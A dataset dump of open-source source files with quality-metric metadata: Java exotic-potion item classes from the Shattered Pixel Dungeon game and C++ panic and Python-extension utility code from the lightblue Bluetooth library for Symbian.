| 1,307 | PotionOfShielding | java | en | java | code | {"qsc_code_num_words": 181, "qsc_code_num_chars": 1307.0, "qsc_code_mean_word_length": 5.42541436, "qsc_code_frac_words_unique": 0.60773481, "qsc_code_frac_chars_top_2grams": 0.06924644, "qsc_code_frac_chars_top_3grams": 0.15478615, "qsc_code_frac_chars_top_4grams": 0.05804481, "qsc_code_frac_chars_dupe_5grams": 0.24643585, "qsc_code_frac_chars_dupe_6grams": 0.16904277, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02199817, "qsc_code_frac_chars_whitespace": 0.16526396, "qsc_code_size_file_byte": 1307.0, "qsc_code_num_lines": 41.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 31.87804878, "qsc_code_frac_chars_alphabet": 0.87809349, "qsc_code_frac_chars_comments": 0.61897475, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07142857, "qsc_codejava_score_lines_no_logic": 0.35714286, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/PotionOfShroudingFog.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Blob;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.SmokeScreen;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.watabou.noosa.audio.Sample;
public class PotionOfShroudingFog extends ExoticPotion {
{
initials = 4;
}
@Override
public void shatter( int cell ) {
if (Dungeon.level.heroFOV[cell]) {
setKnown();
splash( cell );
Sample.INSTANCE.play( Assets.SND_SHATTER );
}
GameScene.add( Blob.seed( cell, 1000, SmokeScreen.class ) );
}
}
| 1,545 | PotionOfShroudingFog | java | en | java | code | {"qsc_code_num_words": 199, "qsc_code_num_chars": 1545.0, "qsc_code_mean_word_length": 5.86934673, "qsc_code_frac_words_unique": 0.59296482, "qsc_code_frac_chars_top_2grams": 0.08732877, "qsc_code_frac_chars_top_3grams": 0.19520548, "qsc_code_frac_chars_top_4grams": 0.18835616, "qsc_code_frac_chars_dupe_5grams": 0.16438356, "qsc_code_frac_chars_dupe_6grams": 0.14212329, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01697531, "qsc_code_frac_chars_whitespace": 0.16116505, "qsc_code_size_file_byte": 1545.0, "qsc_code_num_lines": 50.0, "qsc_code_num_chars_line_max": 74.0, "qsc_code_num_chars_line_mean": 30.9, "qsc_code_frac_chars_alphabet": 0.88425926, "qsc_code_frac_chars_comments": 0.50485437, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.04761905, "qsc_codejava_score_lines_no_logic": 0.38095238, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/PotionOfAdrenalineSurge.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.AdrenalineSurge;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
public class PotionOfAdrenalineSurge extends ExoticPotion {
{
initials = 10;
}
@Override
public void apply(Hero hero) {
setKnown();
Buff.affect(hero, AdrenalineSurge.class).reset(2, 800f);
}
}
| 1,276 | PotionOfAdrenalineSurge | java | en | java | code | {"qsc_code_num_words": 171, "qsc_code_num_chars": 1276.0, "qsc_code_mean_word_length": 5.68421053, "qsc_code_frac_words_unique": 0.61403509, "qsc_code_frac_chars_top_2grams": 0.06995885, "qsc_code_frac_chars_top_3grams": 0.1563786, "qsc_code_frac_chars_top_4grams": 0.05864198, "qsc_code_frac_chars_dupe_5grams": 0.24897119, "qsc_code_frac_chars_dupe_6grams": 0.17078189, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02149533, "qsc_code_frac_chars_whitespace": 0.16144201, "qsc_code_size_file_byte": 1276.0, "qsc_code_num_lines": 40.0, "qsc_code_num_chars_line_max": 78.0, "qsc_code_num_chars_line_mean": 31.9, "qsc_code_frac_chars_alphabet": 0.88691589, "qsc_code_frac_chars_comments": 0.61128527, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07142857, "qsc_codejava_score_lines_no_logic": 0.35714286, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/exotic/ExoticPotion.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.exotic;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfHaste;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.items.Recipe;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.Potion;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfExperience;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfFrost;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfHealing;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfInvisibility;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfLevitation;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfLiquidFlame;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfMindVision;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfParalyticGas;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfPurity;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfStrength;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.PotionOfToxicGas;
import com.shatteredpixel.shatteredpixeldungeon.plants.Plant;
import com.watabou.utils.Reflection;
import java.util.ArrayList;
import java.util.HashMap;
public class ExoticPotion extends Potion {
{
//sprite = equivalent potion sprite but one row down
}
public static final HashMap<Class<?extends Potion>, Class<?extends ExoticPotion>> regToExo = new HashMap<>();
public static final HashMap<Class<?extends ExoticPotion>, Class<?extends Potion>> exoToReg = new HashMap<>();
static{
regToExo.put(PotionOfHealing.class, PotionOfShielding.class);
exoToReg.put(PotionOfShielding.class, PotionOfHealing.class);
regToExo.put(PotionOfToxicGas.class, PotionOfCorrosiveGas.class);
exoToReg.put(PotionOfCorrosiveGas.class, PotionOfToxicGas.class);
regToExo.put(PotionOfStrength.class, PotionOfAdrenalineSurge.class);
exoToReg.put(PotionOfAdrenalineSurge.class, PotionOfStrength.class);
regToExo.put(PotionOfFrost.class, PotionOfSnapFreeze.class);
exoToReg.put(PotionOfSnapFreeze.class, PotionOfFrost.class);
regToExo.put(PotionOfHaste.class, PotionOfStamina.class);
exoToReg.put(PotionOfStamina.class, PotionOfHaste.class);
regToExo.put(PotionOfLiquidFlame.class, PotionOfDragonsBreath.class);
exoToReg.put(PotionOfDragonsBreath.class, PotionOfLiquidFlame.class);
regToExo.put(PotionOfInvisibility.class, PotionOfShroudingFog.class);
exoToReg.put(PotionOfShroudingFog.class, PotionOfInvisibility.class);
regToExo.put(PotionOfMindVision.class, PotionOfMagicalSight.class);
exoToReg.put(PotionOfMagicalSight.class, PotionOfMindVision.class);
regToExo.put(PotionOfLevitation.class, PotionOfStormClouds.class);
exoToReg.put(PotionOfStormClouds.class, PotionOfLevitation.class);
regToExo.put(PotionOfExperience.class, PotionOfHolyFuror.class);
exoToReg.put(PotionOfHolyFuror.class, PotionOfExperience.class);
regToExo.put(PotionOfPurity.class, PotionOfCleansing.class);
exoToReg.put(PotionOfCleansing.class, PotionOfPurity.class);
regToExo.put(PotionOfParalyticGas.class, PotionOfEarthenArmor.class);
exoToReg.put(PotionOfEarthenArmor.class, PotionOfParalyticGas.class);
}
@Override
public boolean isKnown() {
return anonymous || (handler != null && handler.isKnown( exoToReg.get(this.getClass()) ));
}
@Override
public void setKnown() {
if (!isKnown()) {
handler.know(exoToReg.get(this.getClass()));
updateQuickslot();
Potion p = Dungeon.hero.belongings.getItem(getClass());
if (p != null) p.setAction();
p = Dungeon.hero.belongings.getItem(exoToReg.get(this.getClass()));
if (p != null) p.setAction();
}
}
@Override
public void reset() {
super.reset();
if (handler != null && handler.contains(exoToReg.get(this.getClass()))) {
image = handler.image(exoToReg.get(this.getClass())) + 16;
color = handler.label(exoToReg.get(this.getClass()));
}
}
@Override
//20 gold more than its none-exotic equivalent
public int price() {
return (Reflection.newInstance(exoToReg.get(getClass())).price() + 20) * quantity;
}
public static class PotionToExotic extends Recipe{
@Override
public boolean testIngredients(ArrayList<Item> ingredients) {
int s = 0;
Potion p = null;
for (Item i : ingredients){
if (i instanceof Plant.Seed){
s++;
} else if (regToExo.containsKey(i.getClass())) {
p = (Potion)i;
}
}
return p != null && s == 2;
}
@Override
public int cost(ArrayList<Item> ingredients) {
return 0;
}
@Override
public Item brew(ArrayList<Item> ingredients) {
Item result = null;
for (Item i : ingredients){
i.quantity(i.quantity()-1);
if (regToExo.containsKey(i.getClass())) {
result = Reflection.newInstance(regToExo.get(i.getClass()));
}
}
return result;
}
@Override
public Item sampleOutput(ArrayList<Item> ingredients) {
for (Item i : ingredients){
if (regToExo.containsKey(i.getClass())) {
return Reflection.newInstance(regToExo.get(i.getClass()));
}
}
return null;
}
}
}
| 6,124 | ExoticPotion | java | en | java | code | {"qsc_code_num_words": 653, "qsc_code_num_chars": 6124.0, "qsc_code_mean_word_length": 7.16232772, "qsc_code_frac_words_unique": 0.2848392, "qsc_code_frac_chars_top_2grams": 0.06542656, "qsc_code_frac_chars_top_3grams": 0.14624759, "qsc_code_frac_chars_top_4grams": 0.15993158, "qsc_code_frac_chars_dupe_5grams": 0.31024161, "qsc_code_frac_chars_dupe_6grams": 0.21381227, "qsc_code_frac_chars_dupe_7grams": 0.02009835, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00505807, "qsc_code_frac_chars_whitespace": 0.12834749, "qsc_code_size_file_byte": 6124.0, "qsc_code_num_lines": 171.0, "qsc_code_num_chars_line_max": 111.0, "qsc_code_num_chars_line_mean": 35.8128655, "qsc_code_frac_chars_alphabet": 0.87111278, "qsc_code_frac_chars_comments": 0.14337035, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.12605042, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06722689, "qsc_codejava_score_lines_no_logic": 0.26890756, "qsc_codejava_frac_words_no_modifier": 0.88888889, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/series60/_lightblueutil/panic.cpp | // -*- symbian-c++ -*-
//
// panic.cpp
//
// Copyright 2004 Helsinki Institute for Information Technology (HIIT)
// and the authors. All rights reserved.
//
// Authors: Tero Hasu <tero.hasu@hut.fi>
//
// Utilities related to panicking.
//
// Permission is hereby granted, free of charge, to any person
// obtaining a copy of this software and associated documentation files
// (the "Software"), to deal in the Software without restriction,
// including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software,
// and to permit persons to whom the Software is furnished to do so,
// subject to the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
// BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#include <e32std.h>
#include "panic.h"
void AoSocketPanic(TInt aReason)
{
_LIT(KPanicCat, "aosocketnative");
User::Panic(KPanicCat, aReason);
}
void AssertFail()
{
AoSocketPanic(EPanicAssertionFailed);
}
void AssertNonNull(void* aPtr)
{
if (!aPtr)
{
AssertFail();
}
}
void AssertNull(void* aPtr)
{
if (aPtr)
{
AssertFail();
}
}
| 1,678 | panic | cpp | en | cpp | code | {"qsc_code_num_words": 227, "qsc_code_num_chars": 1678.0, "qsc_code_mean_word_length": 5.36563877, "qsc_code_frac_words_unique": 0.55506608, "qsc_code_frac_chars_top_2grams": 0.07224959, "qsc_code_frac_chars_top_3grams": 0.02134647, "qsc_code_frac_chars_top_4grams": 0.02298851, "qsc_code_frac_chars_dupe_5grams": 0.03940887, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00431965, "qsc_code_frac_chars_whitespace": 0.17222884, "qsc_code_size_file_byte": 1678.0, "qsc_code_num_lines": 62.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 27.06451613, "qsc_code_frac_chars_alphabet": 0.87257019, "qsc_code_frac_chars_comments": 0.78545888, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.05833333, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.24, "qsc_codecpp_frac_lines_preprocessor_directives": 0.08, "qsc_codecpp_frac_lines_func_ratio": 0.16, "qsc_codecpp_cate_bitsstdc": 0.0, "qsc_codecpp_nums_lines_main": 0.0, "qsc_codecpp_frac_lines_goto": 0.0, "qsc_codecpp_cate_var_zero": 1.0, "qsc_codecpp_score_lines_no_logic": 0.24, "qsc_codecpp_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codecpp_frac_lines_func_ratio": 0, "qsc_codecpp_nums_lines_main": 0, "qsc_codecpp_score_lines_no_logic": 0, "qsc_codecpp_frac_lines_preprocessor_directives": 0, "qsc_codecpp_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/series60/_lightblueutil/localepocpyutils.h | // -*- symbian-c++ -*-
//
// localepocpyutils.h
//
// Copyright 2004 Helsinki Institute for Information Technology (HIIT)
// and the authors. All rights reserved.
//
// Authors: Tero Hasu <tero.hasu@hut.fi>
//
// Permission is hereby granted, free of charge, to any person
// obtaining a copy of this software and associated documentation files
// (the "Software"), to deal in the Software without restriction,
// including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software,
// and to permit persons to whom the Software is furnished to do so,
// subject to the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
// BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#ifndef __LOCALEPOCPYUTILS_H__
#define __LOCALEPOCPYUTILS_H__
// note that we get warnings, or even errors with some compilers
// (e.g. .NET 7.1) unless this is before the Python headers
#include <e32std.h>
#include <Python.h>
#include <symbian_python_ext_util.h>
#define RETURN_NO_VALUE \
Py_INCREF(Py_None); \
return Py_None;
#define RETURN_TRUE \
Py_INCREF(Py_True); \
return Py_True;
#define RETURN_FALSE \
Py_INCREF(Py_False); \
return Py_False;
#define WAIT_STAT(stat) \
Py_BEGIN_ALLOW_THREADS;\
User::WaitForRequest(stat);\
Py_END_ALLOW_THREADS
/** Returns an error code.
*/
TInt ConstructType(const PyTypeObject* aTypeTemplate,
char* aClassName);
#endif // __LOCALEPOCPYUTILS_H__
